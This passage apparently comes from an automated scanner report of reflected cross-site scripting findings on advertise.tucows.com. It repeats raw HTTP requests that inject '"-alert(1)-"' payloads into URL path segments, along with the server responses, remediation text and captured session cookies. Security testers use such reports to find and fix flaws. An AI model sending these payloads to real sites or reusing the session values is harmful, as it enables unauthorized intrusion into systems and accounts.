Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/jsb36c3"-alert(1)-"b205bb5d532/signupin.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:27 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32525
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28622"-alert(1)-"2ff515b5d95 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js/signupin.js28622"-alert(1)-"2ff515b5d95 HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:48 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32701
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42de8"-alert(1)-"7d8ee46561 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes42de8"-alert(1)-"7d8ee46561/js/x_core.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:19 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32536
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b15de"-alert(1)-"e0f1f5c84c9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/jsb15de"-alert(1)-"e0f1f5c84c9/x_core.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:24 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32290
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd486"-alert(1)-"0da40994d37 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js/x_core.jscd486"-alert(1)-"0da40994d37 HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:36 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 33252
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1fa22"-alert(1)-"0e7110e52dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes1fa22"-alert(1)-"0e7110e52dc/js/xdocsize.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:17 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32569
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c95d"-alert(1)-"1272630c525 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js9c95d"-alert(1)-"1272630c525/xdocsize.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:23 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f090"-alert(1)-"a04c13647f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js/xdocsize.js9f090"-alert(1)-"a04c13647f HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:36 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32156

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8a6f"-alert(1)-"48e3c448543 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includesb8a6f"-alert(1)-"48e3c448543/js/yetii.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:20 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 505a4"-alert(1)-"da5a49629e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js505a4"-alert(1)-"da5a49629e/yetii.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:26 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ad87"-alert(1)-"ee3d1dab97f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js/yetii.js5ad87"-alert(1)-"ee3d1dab97f HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:38 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f637"-alert(1)-"80f9081ac8c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
